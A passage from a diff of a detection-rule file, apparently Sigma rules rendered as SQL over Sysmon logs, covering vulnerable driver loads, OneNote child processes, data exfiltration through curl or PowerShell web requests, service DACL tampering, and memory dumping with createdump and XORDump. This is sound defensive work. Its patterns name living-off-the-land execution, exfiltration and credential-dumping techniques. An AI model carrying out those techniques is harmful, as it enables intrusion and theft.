'c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747', 'd3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34', '3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_drivers.yml" + "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" }, { - "title": "Vulnerable WinRing0 Driver Load", - "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", + "title": "Suspicious Svchost Process", + "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "status": "experimental", - "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "description": "Detects a suspicious svchost process start", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentImage = '') OR (ParentImage = '') OR (ParentImage = '-')))" ], - "filename": "driver_load_win_vuln_winring0_driver.yml" + "filename": "proc_creation_win_svchost_susp_parent_process.yml" }, { - "title": "Usage Of Malicious POORTRY Signed Driver", - "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "title": "Suspicious Microsoft OneNote Child Process", + "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", "status": "experimental", - "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.privilege_escalation", - "attack.t1543", - "attack.t1068" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "File located in the AppData folder with trusted signature" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" ], - "filename": "driver_load_win_mal_poortry_driver.yml" + "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" }, { - "title": "Vulnerable GIGABYTE Driver Load", - "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", - "status": "experimental", - "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", + "status": "test", + "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", + "author": "Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.privilege_escalation", + "attack.persistence", "attack.t1543.003" ], "falsepositives": [ @@ -5668,99 +5500,95 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_gigabyte_driver.yml" + "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" }, { - "title": "Suspicious Driver Load from Temp", - "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", - "status": "test", - "description": "Detects a driver load from a temporary directory", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Data Exfiltration Activity Via CommandLine Tools", + "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "status": "experimental", + "description": "Detects the use of various CLI utilities exfiltrating data via web requests", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "There is a relevant set of false positives depending on applications in the environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (Image LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" ], - "filename": "driver_load_win_susp_temp_use.yml" + "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" }, { - "title": "Vulnerable HW Driver Load", - "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", - "status": "experimental", - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "title": "Renamed Whoami Execution", + "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "status": "test", + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'whoami.exe' AND NOT (Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_hw_driver.yml" + "filename": "proc_creation_win_renamed_whoami.yml" }, { - "title": "DLL Sideloading Of DBGHELP.DLL", - "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "title": "CreateDump Process Dump", + "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "status": "experimental", - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" ], - "filename": "image_load_side_load_dbghelp_dll.yml" + "filename": "proc_creation_win_createdump_lolbin_execution.yml" }, { - "title": "Potential System DLL Sideloading From Non System Locations", - "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - XORDump Execution", + "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "status": "test", + "description": "Detects suspicious use of XORDump process memory dumping utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + "Another tool that uses the command line switches of XORdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' 